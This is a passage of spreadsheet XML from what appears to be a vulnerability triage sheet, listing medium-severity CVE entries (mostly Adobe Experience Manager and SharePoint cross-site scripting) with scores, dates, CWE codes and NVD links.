t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64838</t></is></c></row><row r="1349"><c r="A1349" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1349" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1349" s="5" t="inlineStr"><is><t>CVE-2025-64854</t></is></c><c r="D1349" s="5" t="n"><v>5.4</v></c><c r="E1349" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1349" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1349" s="5" t="inlineStr" /><c r="H1349" s="5" t="n"><v>0.003</v></c><c r="I1349" s="5" t="inlineStr" /><c r="J1349" s="5" t="inlineStr" /><c r="K1349" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1349" s="5" t="inlineStr" /><c r="M1349" s="5" t="inlineStr" /><c r="N1349" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1349" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1349" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1349" s="5" t="inlineStr" /><c r="R1349" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S134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9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64854</t></is></c></row><row r="1350"><c r="A1350" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1350" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1350" s="5" t="inlineStr"><is><t>CVE-2025-64866</t></is></c><c r="D1350" s="5" t="n"><v>5.4</v></c><c r="E1350" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1350" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1350" s="5" t="inlineStr" /><c r="H1350" s="5" t="n"><v>0.003</v></c><c r="I1350" s="5" t="inlineStr" /><c r="J1350" s="5" t="inlineStr" /><c r="K1350" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1350" s="5" t="inlineStr" /><c r="M1350" s="5" t="inlineStr" /><c r="N1350" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1350" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1350" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1350" s="5" t="inlineStr" /><c r="R1350" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S135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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64866</t></is></c></row><row r="1351"><c r="A1351" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1351" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1351" s="5" t="inlineStr"><is><t>CVE-2025-64868</t></is></c><c r="D1351" s="5" t="n"><v>5.4</v></c><c r="E1351" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1351" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1351" s="5" t="inlineStr" /><c r="H1351" s="5" t="n"><v>0.003</v></c><c r="I1351" s="5" t="inlineStr" /><c r="J1351" s="5" t="inlineStr" /><c r="K1351" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1351" s="5" t="inlineStr" /><c r="M1351" s="5" t="inlineStr" /><c r="N1351" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1351" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1351" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1351" s="5" t="inlineStr" /><c r="R1351" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S135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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64868</t></is></c></row><row r="1352"><c r="A1352" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1352" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1352" s="5" t="inlineStr"><is><t>CVE-2026-19479</t></is></c><c r="D1352" s="5" t="n"><v>5.4</v></c><c r="E1352" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1352" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1352" s="5" t="inlineStr" /><c r="H1352" s="5" t="n"><v>0.003</v></c><c r="I1352" s="5" t="inlineStr" /><c r="J1352" s="5" t="inlineStr" /><c r="K1352" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1352" s="5" t="inlineStr" /><c r="M1352" s="5" t="inlineStr" /><c r="N1352" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1352" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1352" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1352" s="5" t="inlineStr" /><c r="R1352" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S135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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19479</t></is></c></row><row r="1353"><c r="A1353" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1353" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1353" s="5" t="inlineStr"><is><t>CVE-2026-19612</t></is></c><c r="D1353" s="5" t="n"><v>5.4</v></c><c r="E1353" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1353" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1353" s="5" t="inlineStr" /><c r="H1353" s="5" t="n"><v>0.003</v></c><c r="I1353" s="5" t="inlineStr" /><c r="J1353" s="5" t="inlineStr" /><c r="K1353" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1353" s="5" t="inlineStr" /><c r="M1353" s="5" t="inlineStr" /><c r="N1353" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1353" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1353" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1353" s="5" t="inlineStr" /><c r="R1353" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S135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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19612</t></is></c></row><row r="1354"><c r="A1354" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1354" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1354" s="5" t="inlineStr"><is><t>CVE-2026-19644</t></is></c><c r="D1354" s="5" t="n"><v>5.4</v></c><c r="E1354" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1354" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1354" s="5" t="inlineStr" /><c r="H1354" s="5" t="n"><v>0.003</v></c><c r="I1354" s="5" t="inlineStr" /><c r="J1354" s="5" t="inlineStr" /><c r="K1354" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1354" s="5" t="inlineStr" /><c r="M1354" s="5" t="inlineStr" /><c r="N1354" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1354" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1354" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1354" s="5" t="inlineStr" /><c r="R1354" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S135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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19644</t></is></c></row><row r="1355"><c r="A1355" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1355" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1355" s="5" t="inlineStr"><is><t>CVE-2026-19713</t></is></c><c r="D1355" s="5" t="n"><v>5.4</v></c><c r="E1355" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1355" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1355" s="5" t="inlineStr" /><c r="H1355" s="5" t="n"><v>0.003</v></c><c r="I1355" s="5" t="inlineStr" /><c r="J1355" s="5" t="inlineStr" /><c r="K1355" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1355" s="5" t="inlineStr" /><c r="M1355" s="5" t="inlineStr" /><c r="N1355" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1355" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1355" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1355" s="5" t="inlineStr" /><c r="R1355" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S135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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19713</t></is></c></row><row r="1356"><c r="A1356" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1356" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1356" s="5" t="inlineStr"><is><t>CVE-2026-2520</t></is></c><c r="D1356" s="5" t="n"><v>5.4</v></c><c r="E1356" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1356" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1356" s="5" t="inlineStr" /><c r="H1356" s="5" t="n"><v>0.002</v></c><c r="I1356" s="5" t="inlineStr" /><c r="J1356" s="5" t="inlineStr" /><c r="K1356" s="5" t="inlineStr" /><c r="L1356" s="5" t="inlineStr" /><c r="M1356" s="5" t="inlineStr" /><c r="N1356" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1356" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1356" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1356" s="5" t="inlineStr" /><c r="R1356" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1356" s="5" t="inlineStr"><is><t>The Online Scheduling and Appointment Booking System – Bookly plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'updateAddon' function in all versions up to, and including, 27.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update any plugin with a main file of 'main.php' to its latest version.</t></is></c><c r="T1356" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-2520</t></is></c></row><row r="1357"><c r="A1357" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1357" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1357" s="5" t="inlineStr"><is><t>CVE-2026-27227</t></is></c><c r="D1357" s="5" t="n"><v>5.4</v></c><c r="E1357" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1357" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1357" s="5" t="inlineStr" /><c r="H1357" s="5" t="n"><v>0.003</v></c><c r="I1357" s="5" t="inlineStr" /><c r="J1357" s="5" t="inlineStr" /><c r="K1357" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1357" s="5" t="inlineStr" /><c r="M1357" s="5" t="inlineStr" /><c r="N1357" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1357" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1357" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1357" s="5" t="inlineStr" /><c r="R1357" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S135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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-27227</t></is></c></row><row r="1358"><c r="A1358" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1358" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1358" s="5" t="inlineStr"><is><t>CVE-2026-52307</t></is></c><c r="D1358" s="5" t="n"><v>5.4</v></c><c r="E1358" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1358" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1358" s="5" t="inlineStr" /><c r="H1358" s="5" t="n"><v>0.003</v></c><c r="I1358" s="5" t="inlineStr" /><c r="J1358" s="5" t="inlineStr" /><c r="K1358" s="5" t="inlineStr" /><c r="L1358" s="5" t="inlineStr" /><c r="M1358" s="5" t="inlineStr" /><c r="N1358" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1358" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1358" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1358" s="5" t="inlineStr" /><c r="R1358" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1358" s="5" t="inlineStr"><is><t>An authenticated stored cross-site scripting (XSS) vulnerability in the Column Management component of ClassCMS 1CMS v5.6 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the title field.</t></is></c><c r="T1358" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-52307</t></is></c></row><row r="1359"><c r="A1359" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1359" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1359" s="5" t="inlineStr"><is><t>CVE-2026-69402</t></is></c><c r="D1359" s="5" t="n"><v>5.4</v></c><c r="E1359" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1359" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1359" s="5" t="inlineStr" /><c r="H1359" s="5" t="n"><v>0.004</v></c><c r="I1359" s="5" t="inlineStr" /><c r="J1359" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1359" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1359" s="5" t="inlineStr" /><c r="M1359" s="5" t="inlineStr" /><c r="N1359" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1359" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1359" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1359" s="5" t="inlineStr" /><c r="R1359" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1359" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="T1359" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69402</t></is></c></row><row r="1360"><c r="A1360" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1360" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1360" s="5" t="inlineStr"><is><t>CVE-2026-69417</t></is></c><c r="D1360" s="5" t="n"><v>5.4</v></c><c r="E1360" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1360" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1360" s="5" t="inlineStr" /><c r="H1360" s="5" t="n"><v>0.004</v></c><c r="I1360" s="5" t="inlineStr" /><c r="J1360" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1360" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1360" s="5" t="inlineStr" /><c r="M1360" s="5" t="inlineStr" /><c r="N1360" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1360" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1360" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1360" s="5" t="inlineStr" /><c r="R1360" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1360" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="T1360" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69417</t></is></c></row><row r="1361"><c r="A1361" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1361" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1361" s="5" t="inlineStr"><is><t>CVE-2026-69690</t></is></c><c r="D1361" s="5" t="n"><v>5.4</v></c><c r="E1361" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1361" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1361" s="5" t="inlineStr" /><c r="H1361" s="5" t="n"><v>0.004</v></c><c r="I1361" s="5" t="inlineStr" /><c r="J1361" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1361" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1361" s="5" t="inlineStr" /><c r="M1361" s="5" t="inlineStr" /><c r="N1361" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1361" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1361" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1361" s="5" t="inlineStr" /><c r="R1361" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1361" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="T1361" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69690</t></is></c></row><row r="1362"><c r="A1362" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1362" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1362" s="5" t="inlineStr"><is><t>CVE-2026-71356</t></is></c><c r="D1362" s="5" t="n"><v>5.4</v></c><c r="E1362" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1362" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1362" s="5" t="inlineStr" /><c r="H1362" s="5" t="n"><v>0.003</v></c><c r="I1362" s="5" t="inlineStr" /><c r="J1362" s="5" t="inlineStr" /><c r="K1362" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1362" s="5" t="inlineStr" /><c r="M1362" s="5" t="inlineStr" /><c r="N1362" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1362" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1362" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1362" s="5" t="inlineStr" /><c r="R1362" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71356</t></is></c></row><row r="1363"><c r="A1363" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1363" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1363" s="5" t="inlineStr"><is><t>CVE-2026-71357</t></is></c><c r="D1363" s="5" t="n"><v>5.4</v></c><c r="E1363" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1363" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1363" s="5" t="inlineStr" /><c r="H1363" s="5" t="n"><v>0.003</v></c><c r="I1363" s="5" t="inlineStr" /><c r="J1363" s="5" t="inlineStr" /><c r="K1363" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1363" s="5" t="inlineStr" /><c r="M1363" s="5" t="inlineStr" /><c r="N1363" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1363" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1363" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1363" s="5" t="inlineStr" /><c r="R1363" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71357</t></is></c></row><row r="1364"><c r="A1364" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1364" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1364" s="5" t="inlineStr"><is><t>CVE-2026-71388</t></is></c><c r="D1364" s="5" t="n"><v>5.4</v></c><c r="E1364" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1364" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1364" s="5" t="inlineStr" /><c r="H1364" s="5" t="n"><v>0.003</v></c><c r="I1364" s="5" t="inlineStr" /><c r="J1364" s="5" t="inlineStr" /><c r="K1364" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1364" s="5" t="inlineStr" /><c r="M1364" s="5" t="inlineStr" /><c r="N1364" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1364" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1364" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1364" s="5" t="inlineStr" /><c r="R1364" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71388</t></is></c></row><row r="1365"><c r="A1365" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1365" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1365" s="5" t="inlineStr"><is><t>CVE-2026-71440</t></is></c><c r="D1365" s="5" t="n"><v>5.4</v></c><c r="E1365" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1365" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1365" s="5" t="inlineStr" /><c r="H1365" s="5" t="n"><v>0.002</v></c><c r="I1365" s="5" t="inlineStr" /><c r="J1365" s="5" t="inlineStr" /><c r="K1365" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1365" s="5" t="inlineStr" /><c r="M1365" s="5" t="inlineStr" /><c r="N1365" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1365" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1365" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1365" s="5" t="inlineStr" /><c r="R1365" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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65" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71440</t></is></c></row><row r="1366"><c r="A1366" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1366" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1366" s="5" t="inlineStr"><is><t>CVE-2026-71565</t></is></c><c r="D1366" s="5" t="n"><v>5.4</v></c><c r="E1366" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1366" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1366" s="5" t="inlineStr" /><c r="H1366" s="5" t="n"><v>0.002</v></c><c r="I1366" s="5" t="inlineStr" /><c r="J1366" s="5" t="inlineStr" /><c r="K1366" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1366" s="5" t="inlineStr" /><c r="M1366" s="5" t="inlineStr" /><c r="N1366" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1366" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1366" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1366" s="5" t="inlineStr" /><c r="R1366" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71565</t></is></c></row><row r="1367"><c r="A1367" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1367" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1367" s="5" t="inlineStr"><is><t>CVE-2026-72626</t></is></c><c r="D1367" s="5" t="n"><v>5.4</v></c><c r="E1367" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1367" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1367" s="5" t="inlineStr" /><c r="H1367" s="5" t="n"><v>0.002</v></c><c r="I1367" s="5" t="inlineStr" /><c r="J1367" s="5" t="inlineStr" /><c r="K1367" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1367" s="5" t="inlineStr" /><c r="M1367" s="5" t="inlineStr" /><c r="N1367" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1367" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1367" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1367" s="5" t="inlineStr" /><c r="R1367" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72626</t></is></c></row><row r="1368"><c r="A1368" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1368" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1368" s="5" t="inlineStr"><is><t>CVE-2026-72627</t></is></c><c r="D1368" s="5" t="n"><v>5.4</v></c><c r="E1368" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1368" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1368" s="5" t="inlineStr" /><c r="H1368" s="5" t="n"><v>0.002</v></c><c r="I1368" s="5" t="inlineStr" /><c r="J1368" s="5" t="inlineStr" /><c r="K1368" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1368" s="5" t="inlineStr" /><c r="M1368" s="5" t="inlineStr" /><c r="N1368" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1368" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1368" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1368" s="5" t="inlineStr" /><c r="R1368" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72627</t></is></c></row><row r="1369"><c r="A1369" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1369" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1369" s="5" t="inlineStr"><is><t>CVE-2026-75629</t></is></c><c r="D1369" s="5" t="n"><v>5.4</v></c><c r="E1369" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1369" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1369" s="5" t="inlineStr" /><c r="H1369" s="5" t="n"><v>0.002</v></c><c r="I1369" s="5" t="inlineStr" /><c r="J1369" s="5" t="inlineStr" /><c r="K1369" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1369" s="5" t="inlineStr" /><c r="M1369" s="5" t="inlineStr" /><c r="N1369" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1369" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1369" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1369" s="5" t="inlineStr" /><c r="R1369" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75629</t></is></c></row><row r="1370"><c r="A1370" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1370" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1370" s="5" t="inlineStr"><is><t>CVE-2026-75635</t></is></c><c r="D1370" s="5" t="n"><v>5.4</v></c><c r="E1370" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1370" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1370" s="5" t="inlineStr" /><c r="H1370" s="5" t="n"><v>0.002</v></c><c r="I1370" s="5" t="inlineStr" /><c r="J1370" s="5" t="inlineStr" /><c r="K1370" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1370" s="5" t="inlineStr" /><c r="M1370" s="5" t="inlineStr" /><c r="N1370" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1370" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1370" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1370" s="5" t="inlineStr" /><c r="R1370" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75635</t></is></c></row><row r="1371"><c r="A1371" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1371" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1371" s="5" t="inlineStr"><is><t>CVE-2026-75636</t></is></c><c r="D1371" s="5" t="n"><v>5.4</v></c><c r="E1371" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1371" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1371" s="5" t="inlineStr" /><c r="H1371" s="5" t="n"><v>0.002</v></c><c r="I1371" s="5" t="inlineStr" /><c r="J1371" s="5" t="inlineStr" /><c r="K1371" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1371" s="5" t="inlineStr" /><c r="M1371" s="5" t="inlineStr" /><c r="N1371" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1371" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1371" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1371" s="5" t="inlineStr" /><c r="R1371" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75636</t></is></c></row><row r="1372"><c r="A1372" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1372" 